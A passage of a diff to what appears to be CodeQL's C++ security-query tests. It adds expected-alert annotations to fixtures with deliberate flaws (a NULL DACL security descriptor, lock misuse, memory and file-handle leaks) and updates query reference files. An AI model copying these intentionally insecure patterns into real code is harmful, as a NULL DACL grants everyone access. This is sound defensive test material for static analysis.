pSecurityDescriptor; BOOL b; - b = SetSecurityDescriptorDacl(pSecurityDescriptor, + b = SetSecurityDescriptorDacl(pSecurityDescriptor, // $ Alert[cpp/unsafe-dacl-security-descriptor] TRUE, // Dacl Present NULL, // NULL pointer to DACL == BUG FALSE); PACL pDacl = NULL; - b = SetSecurityDescriptorDacl(pSecurityDescriptor, + b = SetSecurityDescriptorDacl(pSecurityDescriptor, // $ Alert[cpp/unsafe-dacl-security-descriptor] TRUE, // Dacl Present pDacl, // NULL pointer to DACL == BUG FALSE); @@ -117,7 +117,7 @@ void Test2() FALSE); PACL pDacl2 = returnNull(); - SetSecurityDescriptorDacl( + SetSecurityDescriptorDacl( // $ Alert[cpp/unsafe-dacl-security-descriptor] pSecurityDescriptor, TRUE, // Dacl Present pDacl2, // NULL pointer to DACL == BUG diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.qlref index 6d8a0fc40192..3484b0b876b5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.ql \ No newline at end of file +query: Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/DiningPhilosophers.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/DiningPhilosophers.cpp index de7ff6183f5d..72ca3bf6fb8e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/DiningPhilosophers.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/DiningPhilosophers.cpp @@ -20,11 +20,11 @@ namespace std template void unlock (Mutex1& a, Mutex2& b, Mutexes&... cde); } -std::mutex fork1; -std::mutex fork2; -std::mutex fork3; -std::mutex fork4; -std::mutex fork5; +std::mutex fork1; // $ Alert[cpp/lock-order-cycle] +std::mutex fork2; // $ Alert[cpp/lock-order-cycle] +std::mutex fork3; // $ Alert[cpp/lock-order-cycle] +std::mutex fork4; // $ Alert[cpp/lock-order-cycle] +std::mutex fork5; // $ Alert[cpp/lock-order-cycle] void eat(int ph); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/LockOrderCycle.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/LockOrderCycle.qlref index 0c60fed4501b..fadfcb8e1229 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/LockOrderCycle.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/LockOrderCycle.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-764/LockOrderCycle.ql +query: Security/CWE/CWE-764/LockOrderCycle.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/TwiceLocked.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/TwiceLocked.qlref index 95a3396b1997..a7e200494031 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/TwiceLocked.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/TwiceLocked.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-764/TwiceLocked.ql +query: Security/CWE/CWE-764/TwiceLocked.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/UnreleasedLock.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/UnreleasedLock.qlref index 4ea1070113d9..ca770b8b4a58 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/UnreleasedLock.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/UnreleasedLock.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-764/UnreleasedLock.ql +query: Security/CWE/CWE-764/UnreleasedLock.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/test.cpp index 9114e545fd5e..67ad8f2dd58d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/test.cpp @@ -22,8 +22,8 @@ namespace std void test_1() { std::mutex mtx; - mtx.lock(); - mtx.lock(); + mtx.lock(); // $ Alert[cpp/unreleased-lock] + mtx.lock(); // $ Alert[cpp/twice-locked] Alert[cpp/unreleased-lock] mtx.unlock(); } @@ -32,7 +32,7 @@ void test_2() { std::mutex mtx; mtx.lock(); - mtx.lock(); + mtx.lock(); // $ Alert[cpp/twice-locked] mtx.unlock(); mtx.unlock(); } @@ -51,7 +51,7 @@ void test_3() void test_4(bool something) { std::mutex mtx; - mtx.lock(); + mtx.lock(); // $ Alert[cpp/unreleased-lock] if (something) { mtx.unlock(); } else { @@ -85,8 +85,8 @@ void test_7() { std::mutex mtx1; std::mutex mtx2; - mtx1.lock(); - mtx2.lock(); + mtx1.lock(); // $ Alert[cpp/unreleased-lock] + mtx2.lock(); // $ Alert[cpp/unreleased-lock] std::unlock(mtx1, mtx2); } @@ -105,7 +105,7 @@ void test_8() void test_9() { std::mutex mtx; - if (mtx.try_lock()) { + if (mtx.try_lock()) { // $ Alert[cpp/unreleased-lock] return; } mtx.unlock(); @@ -134,7 +134,7 @@ std::mutex static_mtx02; // Helper function for testing the inter-procedural analysis. void set02() { - static_mtx02.lock(); + static_mtx02.lock(); // $ Alert[cpp/twice-locked] } // Helper function for testing the inter-procedural analysis. @@ -153,7 +153,7 @@ std::mutex static_mtx03; // Helper function for testing the inter-procedural analysis. void set03() { - static_mtx03.lock(); + static_mtx03.lock(); // $ Alert[cpp/twice-locked] } // Helper function for testing the inter-procedural analysis. @@ -174,7 +174,7 @@ void interproc_test_03(int n) { // BAD. void interproc_test_04(int n) { static std::mutex mtx; - mtx.lock(); + mtx.lock(); // $ Alert[cpp/twice-locked] if (n < 10) { // BAD: recursive call will attempt to lock the mutex again. interproc_test_04(n+1); @@ -215,7 +215,7 @@ void interproc_test_06() { void interproc_test_07() { std::mutex mtx; set(mtx); - set(mtx); + set(mtx); // $ Alert[cpp/twice-locked] unset(mtx); } @@ -224,7 +224,7 @@ void interproc_test_08(std::mutex &mtx, int n) { set(mtx); if (n < 10) { // BAD: recursive call will attempt to lock the mutex again. - interproc_test_08(mtx, n+1); + interproc_test_08(mtx, n+1); // $ Alert[cpp/twice-locked] } unset(mtx); } @@ -300,7 +300,7 @@ void interproc_test_09() { void test_10() { std::mutex mtx; - if (!mtx.try_lock()) { // [FALSE POSITIVE] + if (!mtx.try_lock()) { // [FALSE POSITIVE] // $ Alert[cpp/unreleased-lock] } else { mtx.unlock(); } @@ -310,7 +310,7 @@ void test_10() void test_11() { std::mutex mtx; - if (!mtx.try_lock()) { // [FALSE POSITIVE] + if (!mtx.try_lock()) { // [FALSE POSITIVE] // $ Alert[cpp/unreleased-lock] return; } @@ -357,7 +357,7 @@ void twice_locked_1() std::mutex mtx; mtx.lock(); - mtx.lock(); + mtx.lock(); // $ Alert[cpp/twice-locked] mtx.unlock(); mtx.unlock(); } @@ -380,13 +380,13 @@ void twice_locked_3() if (mtx.try_lock()) { - mtx.lock(); + mtx.lock(); // $ Alert[cpp/twice-locked] mtx.unlock(); mtx.unlock(); } } -std::mutex static_mtx_01a, static_mtx_01b; +std::mutex static_mtx_01a, static_mtx_01b; // $ Alert[cpp/lock-order-cycle] // BAD void lock_order_1(int cond) @@ -439,7 +439,7 @@ struct data_t { bool test_mutex(data_t *data) { - CHECK(mutex_lock(&(data->mutex))); // GOOD [FALSE POSITIVE] + CHECK(mutex_lock(&(data->mutex))); // GOOD [FALSE POSITIVE] // $ Alert[cpp/unreleased-lock] data->val = 1; CHECK(mutex_unlock(&(data->mutex))); @@ -479,7 +479,7 @@ int test_MyClass_good(MyClass *obj) int test_MyClass_bad(MyClass *obj) { - pthread_mutex_lock(&obj->lock); + pthread_mutex_lock(&obj->lock); // $ Alert[cpp/unreleased-lock] if (maybe()) { return -1; // BAD diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/FileMayNotBeClosed.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/FileMayNotBeClosed.qlref index fd711c007f04..8d189be099bf 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/FileMayNotBeClosed.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/FileMayNotBeClosed.qlref @@ -1 +1,2 @@ -Critical/FileMayNotBeClosed.ql \ No newline at end of file +query: Critical/FileMayNotBeClosed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/FileNeverClosed.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/FileNeverClosed.qlref index 825ac26f500c..25b57b1736d7 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/FileNeverClosed.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/FileNeverClosed.qlref @@ -1 +1,2 @@ -Critical/FileNeverClosed.ql +query: Critical/FileNeverClosed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/MemoryMayNotBeFreed.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/MemoryMayNotBeFreed.qlref index 33da8e296e22..84fd18014db0 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/MemoryMayNotBeFreed.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/MemoryMayNotBeFreed.qlref @@ -1 +1,2 @@ -Critical/MemoryMayNotBeFreed.ql \ No newline at end of file +query: Critical/MemoryMayNotBeFreed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/MemoryNeverFreed.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/MemoryNeverFreed.qlref index 2d1336a55ebf..108a872987d7 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/MemoryNeverFreed.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/MemoryNeverFreed.qlref @@ -1 +1,2 @@ -Critical/MemoryNeverFreed.ql \ No newline at end of file +query: Critical/MemoryNeverFreed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/tests.cpp index e7b889deb08c..83770de1c98b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/tests.cpp @@ -68,7 +68,7 @@ namespace CWE401_Memory_Leak__new_int_17 for(i = 0; i < 1; i++) { /* POTENTIAL FLAW: Allocate memory on the heap */ - data = new int; // BAD + data = new int; // BAD // $ Alert[cpp/memory-never-freed] /* Initialize and make use of data */ *data = 5; printIntLine(*data); @@ -133,7 +133,7 @@ void CWE401_Memory_Leak__char_malloc_32_bad() { char * data = *dataPtr1; /* POTENTIAL FLAW: Allocate memory on the heap */ - data = (char *)malloc(100*sizeof(char)); // BAD + data = (char *)malloc(100*sizeof(char)); // BAD // $ Alert[cpp/memory-never-freed] /* Initialize and make use of data */ strcpy(data, "A String"); printLine(data); @@ -195,7 +195,7 @@ static void CWE401_Memory_Leak__char_malloc_32_goodB2G() void CWE401_Memory_Leak__malloc_realloc_char_01_bad() { { - char * data = (char *)malloc(100*sizeof(char)); // BAD + char * data = (char *)malloc(100*sizeof(char)); // BAD // $ Alert[cpp/memory-may-not-be-freed] /* Initialize and make use of data */ strcpy(data, "A String"); printLine(data); @@ -217,7 +217,7 @@ void CWE775_Missing_Release_of_File_Descriptor_or_Handle__fopen_no_close_17_bad( FILE * data; data = NULL; /* POTENTIAL FLAW: Open a file without closing it */ - data = fopen("BadSource_fopen.txt", "w+"); // BAD + data = fopen("BadSource_fopen.txt", "w+"); // BAD // $ Alert[cpp/file-never-closed] for(j = 0; j < 1; j++) { /* FLAW: No attempt to close the file */ @@ -249,7 +249,7 @@ void CWE775_Missing_Release_of_File_Descriptor_or_Handle__open_no_close_01_bad() /* Initialize data */ data = -1; /* POTENTIAL FLAW: Open a file without closing it */ - data = OPEN("BadSource_open.txt", O_RDWR|O_CREAT, S_IREAD|S_IWRITE); // BAD + data = OPEN("BadSource_open.txt", O_RDWR|O_CREAT, S_IREAD|S_IWRITE); // BAD // $ Alert[cpp/file-never-closed] /* FLAW: No attempt to close the file */ ; /* empty statement needed for some flow variants */ } @@ -275,7 +275,7 @@ void CWE775_Missing_Release_of_File_Descriptor_or_Handle__w32CreateFile_no_close /* Initialize data */ data = INVALID_HANDLE_VALUE; /* POTENTIAL FLAW: Open a file without closing it */ - data = CreateFile("BadSource_w32CreateFile.txt", // BAD + data = CreateFile("BadSource_w32CreateFile.txt", // BAD // $ Alert[cpp/file-never-closed] (GENERIC_WRITE|GENERIC_READ), 0, NULL, @@ -322,7 +322,7 @@ void CWE401_Memory_Leak__twoIntsStruct_realloc_01_bad() twoIntsStruct * data; data = NULL; /* POTENTIAL FLAW: Allocate memory on the heap */ - data = (twoIntsStruct *)realloc(data, 100*sizeof(twoIntsStruct)); + data = (twoIntsStruct *)realloc(data, 100*sizeof(twoIntsStruct)); // $ Alert[cpp/memory-may-not-be-freed] if (data == NULL) {exit(-1);} /* Initialize and make use of data */ data[0].intOne = 0; diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/FileMayNotBeClosed.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/FileMayNotBeClosed.qlref index fd711c007f04..8d189be099bf 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/FileMayNotBeClosed.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/FileMayNotBeClosed.qlref @@ -1 +1,2 @@ -Critical/FileMayNotBeClosed.ql \ No newline at end of file +query: Critical/FileMayNotBeClosed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/FileNeverClosed.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/FileNeverClosed.qlref index 825ac26f500c..25b57b1736d7 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/FileNeverClosed.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/FileNeverClosed.qlref @@ -1 +1,2 @@ -Critical/FileNeverClosed.ql +query: Critical/FileNeverClosed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/test.cpp index 1e24ded49f53..ae7c1e5cdc09 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/test.cpp @@ -48,7 +48,7 @@ void test4() FILE *f; // fopen, never fclose (BAD: f is never closed) - f = fopen("myFile.txt", "wt"); + f = fopen("myFile.txt", "wt"); // $ Alert[cpp/file-never-closed] } void test5(int cond) @@ -56,7 +56,7 @@ void test5(int cond) FILE *f; // fopen, sometimes fclose (BAD: f is not always closed) - f = fopen("myFile.txt", "wt"); + f = fopen("myFile.txt", "wt"); // $ Alert[cpp/file-may-not-be-closed] if (cond == 0) { fclose(f); @@ -66,7 +66,7 @@ void test5(int cond) void test6(int cond) { // fopen, sometimes fclose (BAD: f is not always closed) - FILE *f = fopen("myFile.txt", "wt"); + FILE *f = fopen("myFile.txt", "wt"); // $ Alert[cpp/file-may-not-be-closed] if (cond == 0) { @@ -82,7 +82,7 @@ void test7() // fopen, assign, close f twice (BAD: g is never closed) f = fopen("myFile.txt", "wt"); - g = fopen("myFile.txt", "wt"); + g = fopen("myFile.txt", "wt"); // $ Alert[cpp/file-may-not-be-closed] g = f; fclose(g); fclose(f); @@ -112,10 +112,10 @@ void test8(int cond) test8_close(f); // fopen, don't close (BAD: g is never closed) - g = test8_open(); + g = test8_open(); // $ Alert[cpp/file-may-not-be-closed] // fopen, sometimes fclose (BAD: h is not always closed) - h = test8_open(); + h = test8_open(); // $ Alert[cpp/file-may-not-be-closed] if (cond == 0) { return; @@ -130,7 +130,7 @@ class myClass9 { a = fopen("myFile1.txt", "rt"); // closed in destructor (GOOD) b = fopen("myFile2.txt", "rt"); // unreliably closed in destructor (BAD) [NOT REPORTED] - c = fopen("myFile3.txt", "rt"); // never closed in destructor (BAD) + c = fopen("myFile3.txt", "rt"); // never closed in destructor (BAD) // $ Alert[cpp/file-never-closed] } void myOpenMethod(const char *filename) @@ -181,7 +181,7 @@ void test11() FILE *f, *g; // fopen, assign, but do not close (BAD) - f = fopen("myFile1.bin", "rb"); + f = fopen("myFile1.bin", "rb"); // $ Alert[cpp/file-never-closed] g = f; } @@ -218,7 +218,7 @@ void test13(int cond) void test14() { - FILE *f = fopen("f.txt", "rt"); // fopen, forget, don't close (BAD) + FILE *f = fopen("f.txt", "rt"); // fopen, forget, don't close (BAD) // $ Alert[cpp/file-may-not-be-closed] f = 0; fclose(f); @@ -237,7 +237,7 @@ void test15() void test16() { FILE *f = fopen("f.txt", "rt"); // fopen, always close in loop (GOOD) - FILE *g = fopen("g.txt", "rt"); // fopen, don't close in loop (BAD) + FILE *g = fopen("g.txt", "rt"); // fopen, don't close in loop (BAD) // $ Alert[cpp/file-may-not-be-closed] int i; for (i = 0; i < 1; i++) @@ -250,7 +250,7 @@ void test16() void test17() { - FILE *f = fopen("f.txt", "rt"); // fopen, don't close in loop (BAD) + FILE *f = fopen("f.txt", "rt"); // fopen, don't close in loop (BAD) // $ Alert[cpp/file-may-not-be-closed] int i; for (i = 0; i < 0; i++) @@ -273,7 +273,7 @@ void test18() void test19() { - FILE *f = fopen("f.txt", "rt"); // fopen, return in loop, don't close (BAD) + FILE *f = fopen("f.txt", "rt"); // fopen, return in loop, don't close (BAD) // $ Alert[cpp/file-may-not-be-closed] int i; for (i = 0; i < 1; i++) @@ -296,7 +296,7 @@ void test20() void test21() { - FILE *f = fopen("f.txt", "rt"); // fopen, don't close in loop increment (BAD) + FILE *f = fopen("f.txt", "rt"); // fopen, don't close in loop increment (BAD) // $ Alert[cpp/file-may-not-be-closed] int i; for (i = 0; i < 0; fclose(f)) @@ -307,7 +307,7 @@ void test21() void test22() { FILE *f = fopen("f.txt", "rt"); // fopen, close in condition inside loop (GOOD) - FILE *g = fopen("g.txt", "rt"); // fopen, don't close in condition inside loop (BAD) + FILE *g = fopen("g.txt", "rt"); // fopen, don't close in condition inside loop (BAD) // $ Alert[cpp/file-may-not-be-closed] bool b = true; while (b) @@ -353,7 +353,7 @@ void test24() void test25() { - FILE *f = fopen("f.txt", "rt"); // fopen, don't close in nested loops (BAD) + FILE *f = fopen("f.txt", "rt"); // fopen, don't close in nested loops (BAD) // $ Alert[cpp/file-may-not-be-closed] int i, j, k; for (i = 0; i < 1; i++) @@ -381,7 +381,7 @@ void test26() void test27() { - FILE *f = fopen("f.txt", "rt"); // fopen, don't close after loop (BAD) + FILE *f = fopen("f.txt", "rt"); // fopen, don't close after loop (BAD) // $ Alert[cpp/file-may-not-be-closed] int i; for (i = 0; i < 10; i++) @@ -460,7 +460,7 @@ void test29() void test30() { // cases that do not involve a variable - fopen("myFile.txt", "wt"); // BAD: not closed + fopen("myFile.txt", "wt"); // BAD: not closed // $ Alert[cpp/file-never-closed] fclose(fopen("myFile.txt", "wt")); // GOOD } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/MemoryMayNotBeFreed.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/MemoryMayNotBeFreed.qlref index 33da8e296e22..84fd18014db0 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/MemoryMayNotBeFreed.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/MemoryMayNotBeFreed.qlref @@ -1 +1,2 @@ -Critical/MemoryMayNotBeFreed.ql \ No newline at end of file +query: Critical/MemoryMayNotBeFreed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/MemoryNeverFreed.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/MemoryNeverFreed.qlref index 2d1336a55ebf..108a872987d7 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/MemoryNeverFreed.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/MemoryNeverFreed.qlref @@ -1 +1,2 @@ -Critical/MemoryNeverFreed.ql \ No newline at end of file +query: Critical/MemoryNeverFreed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/test.cpp index 29b5709b9654..7bc2b737057e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/test.cpp @@ -59,7 +59,7 @@ void test5(int cond) // malloc, sometimes free void *ptr; - ptr = malloc(sizeof(char) * 1024); // BAD: not always freed + ptr = malloc(sizeof(char) * 1024); // BAD: not always freed // $ Alert[cpp/memory-may-not-be-freed] if (cond == 0) { free(ptr); @@ -71,7 +71,7 @@ void test6(int cond) // malloc, sometimes free void *ptr; - ptr = malloc(sizeof(char) * 1024); // BAD: not always freed + ptr = malloc(sizeof(char) * 1024); // BAD: not always freed // $ Alert[cpp/memory-may-not-be-freed] if (cond == 0) { return; @@ -95,7 +95,7 @@ void test8() // malloc, reassign, don't free char *a, *b; - a = (char *)malloc(10); // BAD: a is not freed + a = (char *)malloc(10); // BAD: a is not freed // $ Alert[cpp/memory-never-freed] b = a; } @@ -104,7 +104,7 @@ void test9() // malloc, overwrite, don't free char *a; - a = (char *)malloc(10); // BAD: not freed + a = (char *)malloc(10); // BAD: not freed // $ Alert[cpp/memory-may-not-be-freed] a = (char *)malloc(20); free(a); } @@ -133,10 +133,10 @@ void test10(int cond) test10_free(a); // alloc, don't free b - b = test10_alloc(); // BAD: b is never freed + b = test10_alloc(); // BAD: b is never freed // $ Alert[cpp/memory-may-not-be-freed] // alloc, sometimes free c - c = test10_alloc(); // BAD: c is not always freed + c = test10_alloc(); // BAD: c is not always freed // $ Alert[cpp/memory-may-not-be-freed] if (cond == 0) { return; @@ -151,7 +151,7 @@ class myClass11 { a = (char *)malloc(1); // freed in destructor (GOOD) b = (char *)malloc(1); // unreliably freed in destructor (BAD) [NOT REPORTED] - c = (char *)malloc(1); // never freed in destructor (BAD) + c = (char *)malloc(1); // never freed in destructor (BAD) // $ Alert[cpp/memory-never-freed] } void myAllocMethod(int amount) @@ -196,9 +196,9 @@ void test13() void *a = new int; // new, delete (GOOD) void *b = new char[10]; // new, delete (GOOD) char *c = new char[20]; // new, delete (GOOD) - void *d = new int; // new, don't delete (BAD) - void *e = new char[10]; // new, don't delete (BAD) - char *f = new char[20]; // new, don't delete (BAD) + void *d = new int; // new, don't delete (BAD) // $ Alert[cpp/memory-never-freed] + void *e = new char[10]; // new, don't delete (BAD) // $ Alert[cpp/memory-never-freed] + char *f = new char[20]; // new, don't delete (BAD) // $ Alert[cpp/memory-never-freed] delete (int *)a; delete [] (int *)b; @@ -232,26 +232,26 @@ void test14() ff(a); // alloc, don't free via function pointer (BAD) - b = af(2000); + b = af(2000); // $ Alert[cpp/memory-may-not-be-freed] } void test15() { void *ptr1, *ptr2, *ptr3; - ptr1 = realloc(NULL, 10); // alloc 10 bytes (BAD - not freed if the next realloc fails) + ptr1 = realloc(NULL, 10); // alloc 10 bytes (BAD - not freed if the next realloc fails) // $ Alert[cpp/memory-may-not-be-freed] ptr1 = realloc(ptr1, 20); // realloc 20 bytes (GOOD) ptr1 = realloc(ptr1, 0); // free (GOOD) - ptr2 = realloc(NULL, 10); // alloc 10 bytes (BAD - only freed if the call below succeeds) - ptr2 = realloc(ptr2, 20); // realloc 20 bytes, never free (BAD) + ptr2 = realloc(NULL, 10); // alloc 10 bytes (BAD - only freed if the call below succeeds) // $ Alert[cpp/memory-may-not-be-freed] + ptr2 = realloc(ptr2, 20); // realloc 20 bytes, never free (BAD) // $ Alert[cpp/memory-may-not-be-freed] - ptr3 = realloc(NULL, 10); // alloc 10 bytes, never free (BAD) + ptr3 = realloc(NULL, 10); // alloc 10 bytes, never free (BAD) // $ Alert[cpp/memory-never-freed] } void test16(int cond) { - void *ptr = malloc(1024); // not always freed (BAD) + void *ptr = malloc(1024); // not always freed (BAD) // $ Alert[cpp/memory-may-not-be-freed] if (ptr) { if (cond) @@ -271,7 +271,7 @@ void test16(int cond) void test17(int cond) { // malloc, sometimes free (BAD: ptr is not always freed) - void *ptr = malloc(1024); + void *ptr = malloc(1024); // $ Alert[cpp/memory-may-not-be-freed] if (cond == 0) { @@ -284,7 +284,7 @@ void test17(int cond) void test18(int cond) { // malloc, sometimes free (BAD: ptr is not always freed) - void *ptr = malloc(1024); + void *ptr = malloc(1024); // $ Alert[cpp/memory-may-not-be-freed] if (cond == 0) { @@ -352,12 +352,12 @@ void test22(int cond) { // new, don't delete (BAD) - Vector3 *myVector2 = new Vector3(1.0f, 2.0f, 3.0f); + Vector3 *myVector2 = new Vector3(1.0f, 2.0f, 3.0f); // $ Alert[cpp/memory-never-freed] } { // new, sometimes delete (BAD) - Vector3 *myVector3 = new Vector3(1.0f, 2.0f, 3.0f); + Vector3 *myVector3 = new Vector3(1.0f, 2.0f, 3.0f); // $ Alert[cpp/memory-may-not-be-freed] if (cond) { delete myVector3; @@ -379,7 +379,7 @@ void test23() { { // malloc, free incorrectly (BAD) - char *buffer = (char *)malloc(100); + char *buffer = (char *)malloc(100); // $ Alert[cpp/memory-may-not-be-freed] free(buffer + 10); } @@ -394,7 +394,7 @@ void test23() { // new, delete incorrectly - container *c = new container; // BAD: not deleted + container *c = new container; // BAD: not deleted // $ Alert[cpp/memory-never-freed] c->thingPtr = new thing; delete c->thingPtr; @@ -448,7 +448,7 @@ void test25() } realloc(ptr2, 0); // equivalent to free(ptr2) (GOOD) - ptr3 = realloc(NULL, 10); // alloc 10 bytes (BAD - not freed if next realloc fails) + ptr3 = realloc(NULL, 10); // alloc 10 bytes (BAD - not freed if next realloc fails) // $ Alert[cpp/memory-may-not-be-freed] ptr4 = realloc(ptr3, 20); // realloc 20 bytes (GOOD) if (ptr4 != NULL) // (this checks for success instead of failure!) { @@ -457,7 +457,7 @@ void test25() } realloc(ptr4, 0); // equivalent to free(ptr4) (GOOD) - ptr5 = realloc(NULL, 10); // alloc 10 bytes (BAD - not freed if the next realloc fails) + ptr5 = realloc(NULL, 10); // alloc 10 bytes (BAD - not freed if the next realloc fails) // $ Alert[cpp/memory-may-not-be-freed] ptr6 = realloc(ptr5, 20); // realloc 20 bytes (GOOD) ptr7 = realloc(ptr6, 0); // free (GOOD) } @@ -519,10 +519,10 @@ void test27() { void *ptr = NULL; - ptr = realloc(ptr, 10); // BAD (not freed if the second realloc fails) + ptr = realloc(ptr, 10); // BAD (not freed if the second realloc fails) // $ Alert[cpp/memory-may-not-be-freed] if (ptr != NULL) { - ptr = realloc(ptr, 20); // BAD (not freed) + ptr = realloc(ptr, 20); // BAD (not freed) // $ Alert[cpp/memory-may-not-be-freed] if (ptr != NULL) { dostuff(); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.expected index fc3a964b2bf3..5a1e5dbcbc5b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.expected @@ -1,3 +1,5 @@ +#select +| test.cpp:24:10:24:35 | ! ... | test.cpp:20:29:20:47 | *call to getenv | test.cpp:24:10:24:35 | ! ... | Reliance on $@ to raise privilege at $@. | test.cpp:20:29:20:47 | *call to getenv | an environment variable | test.cpp:25:9:25:27 | ... = ... | ... = ... | edges | test.cpp:20:29:20:47 | *call to getenv | test.cpp:20:29:20:47 | *call to getenv | provenance | | | test.cpp:20:29:20:47 | *call to getenv | test.cpp:24:10:24:35 | ! ... | provenance | TaintFunction | @@ -6,5 +8,3 @@ nodes | test.cpp:20:29:20:47 | *call to getenv | semmle.label | 